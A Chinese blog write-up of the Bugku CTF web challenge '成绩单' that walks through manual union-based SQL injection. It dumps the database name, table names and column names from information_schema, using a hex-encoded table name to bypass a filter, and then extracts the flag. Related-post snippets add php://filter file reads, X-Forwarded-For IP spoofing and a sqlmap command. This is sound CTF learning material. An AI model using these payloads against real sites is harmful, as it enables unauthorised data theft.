Bugku 成绩单-有感

最新推荐文章于 2020-09-21 17:07:04 发布
最新推荐文章于 2020-09-21 17:07:04 发布
阅读量199 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39607945/article/details/84656648
版权

这是一个简单的数据库注入题目

题目地址http://123.206.87.240:8002/chengjidan/
因为个人是个小白,看到题目毫无头绪。在网上搜到wp,参考着得以理解。
这个题目需要手动爆破数据库的 库名、表名、列名、内容。
库名
用数据库联合查询语句: id=-1’ union select 1,2,3,database()#得到数据库名字skctf_flag
表名
id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名fl4g,sc。 flag显然在fl4g中。
列名
id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#
这里需要说明,爆破列名时,如果直接使用“fl4g”,查询无果,考虑到是过滤,进行ascall转十六进制查询。得到列明字段skctf_flag。
内容
id=-1’ union select 1,2,3,skctf_flag from fl4g# 得到flag。

做这个题目,最直观的感受是对sql注入的进一步理解,之前遇到此类题目,完全没有任何思路,相信以后遇到注入题目能逐渐加深认识吧。

GG BON
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
思想品德:第一单元-感受时代脉动复习课件(北师大版九年级).ppt
10-07
思想品德:第一单元-感受时代脉动复习课件(北师大版九年级).ppt
CTF BugKu平台———(Web篇②)
Aluxian_的博客
05-10 947
源代码: unescape编码:https://tool.chinaz.com/Tools/Escape.aspx PS:p1+’%35%34%61%61%32’ + p2 然后提交即可 67d709b2b54aa2aa648cf6e87a7114f1 文件包含: file=php://filter/read=convert.base64-encode/resource=index.php #构造pyload 好像需要密码: bp爆破密码:12468 备份是个好习惯: ...
bugku-这是一个神奇的登陆框(附代码)(详细)
偷一个月亮
06-20 886
题目链接:http://123.206.87.240:9001/sql/ 数据库 表名 列名 select flag 代码 admin_name=admin" union select database(),database() #&admin_passwd=12345&submit=GO+GO+GO admin_name=admin" union select (s...
BUGku 账号被盗了
ChenZIDu的博客
04-13 2552
简单数据流分析 进去之后点击进入 文字说我们不是管理员 没什么提示,抓个包看看; 显示false,改成true ,然后repeater下试试看 发现出来个网页,打开后自动下载一个叫123.exe的文件 跟游戏有关的,利用wireshark分析一下; 注意! 如果是手机热点连的电脑就选wifi,如果是有线的就选以太网。我在这里卡了好久...
bugku 多种方法解决
qq_38807738的博客
12-01 1503
打开题目,得到一个压缩包,解压得到一个.exe文件,用winhex打开它,发现它是一个base64加密的jpg图片 将winhex看见的代码做一个在线转换解密(网址:http://imgbase64.duoshitong.com/) 得到一个二维码,扫一下,得到key...
bugku——管理员系统
吃肉唐僧的博客
09-01 896
打开题目,盲猜 提示“IP禁止访问,请联系本地管理员登陆,IP已被记录.” 打开源码,发现base64的字符串 解码 猜测名字为admin,pass为test123 还是失败,同样提示ip被禁 看到本地管理员,想到用X-Forwarded-For: 127.0.0.1伪造本地ip 拿到flag ...
镜子-有感于做人作文.doc
01-08
镜子-有感于做人作文.doc
看《大象传奇》-有感作文.doc
03-01
看《大象传奇》-有感作文.doc
读《诺曼底号遇难记》-有感作文.doc
01-28
读《诺曼底号遇难记》-有感作文.doc
直观感受一下 GPT-4 的写作能力,强大而惊艳
04-10
正如 OpenAI 官方和许多媒体所言,GPT-4 强大而惊艳,而这种强大只有切身体会才能有直观深刻的理解与感受。我在这些天里测试了 GPT-4 的许多层面的能力,其中一项就是写作。先说结论:GPT-4 在写作层面的逻辑、流畅...
bugku 这是一个神奇的登录框
Superpig的博客
11-19 3306
步骤 1、打开题目链接,是一个登录界面,抓包后传数据进行尝试 2、尝试数据 先尝试admin_name=1&admin_passwd=1&submit=GO+GO+GO 得到Try Again! 尝试admin_name=1'&admin_passwd=1&submit=GO+GO+GO 仍然得到Try Again! ,说明 ’ 被过滤了 尝试admin...
Bugku--乌云邀请码
博客
10-20 4989
下载下来的压缩包解压后是一张图片 用 Stegsolve查看图片的每个颜色通道,发现三原色的0位的左上角有点奇怪,应该是LSB隐写 打开Stegsolve->Analyse->Data Extract,选取相应颜色通道 更改Bit Plane Order,就得到flag了 顺便总结一下图片隐写常用套路 1、能打开的先用stegsolve看一下各个颜色通道有没有隐藏信息,或者是不...
BugkuCTF_管理员系统
qq_46635165的博客
09-21 711
打开解题网址,一个账户密码登录界面,并尝试管理员身份登录,出现一行提示: 一开始以为是SQL注入题,经过尝试后确定不是,然后又回到题目看提示,提示是本地管理员登录,本地两个字,想到一种叫做 本地 IP 伪造的说法,然后网上查了一下,专业术语叫做 XFF 头伪造:具体详请请看转载博客:点这里 具体做法: 1,首先使用抓包工具,把页面的数据包抓取: 然后在请求头部 Headers 添加 X-Forwarded-For:127.0.0.1 : go一下,出现凭证无效提示: 仔细一想,此时缺的是一个管理员的密
bugku 账号被盗了
zyh18851473527的博客
07-19 1344
第一步:打开链接发现是一个网页 想到抓包 第二步:打开burpsuit 第三步:显示false,改成true ,试试看 第四步:得到一个网站链接打开,打开后自动下载一个叫123.exe的文件 发现是一个游戏网站 第五步:根据大佬的提示跟游戏有关的,利用wireshark分析一下 筛选tcp流追踪一下User和pass 第六步:发现了存在base64加密文字 ...
Bugku web管理员系统
chesterblue的博客
04-01 1241
在做这道题时,一开始看到ip被ban,就想在网上查一下怎样伪造ip地址,然后在网上查到了X-FORWARDED-FOR:127.0.0.1,通过这个请求头可以伪造为本地ip,但是怎样尝试都无法得到响应,仔细一看是这句活的位置写错了。。。。 正确位置: ...
BUGKU--web--成绩单解析
爱吃小敏饭团子的博客
08-24 199
BUGKU 没有任何过滤 非常友好 题目地址 :http://123.206.87.240:8002/chengjidan/ 按照题目提示输入123分别的到不同的人的成绩单 4以后出现空白,由此可以推测有4列 基本到这里就是典型的sql注入题了 打开BP firefox浏览器调节代理 BP抓包发现是POST传值 关闭代理,关闭BP 上sqlmap注入 python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --f
bugku 成绩查询
Superpig的博客
11-10 2303
分析 典型的sql联合注入,用bp进行爆破。 step1: 联合注入要求查询列数相同,姓名、语数外一共四个数据,因此select 1,2,3,4 令id=a’是为了使前一个查询无效而回显第二个查询(也可以使用其他字符,只要保证union前的查询无效即可) id=a' union select 1,2,3,4# step2:查询数据库名 id=a' union select 1,2,3,datab...
BugkuCTF】Web--成绩单
VZZmieshenquan的博客
02-09 1058
Description: 快来查查成绩吧 http://123.206.87.240:8002/chengjidan/ Solution: Flag:
bugku 成绩单
rommel的博客
08-23 7241
成绩查询 龙龙龙的成绩单 Math English Chinese 60 60 70 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1' union select 1,2,3,database(
学生成绩管理系统实验感受
最新发布
01-01
根据提供的引用内容,我无法直接回答关于学生成绩管理系统实验的感受。引用提到了学生成绩管理系统的实验目的,主要是为了掌握链表等数据结构的基本操作,并解决一些基本的问题。引用提供了一个C语言课程设计的学生...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值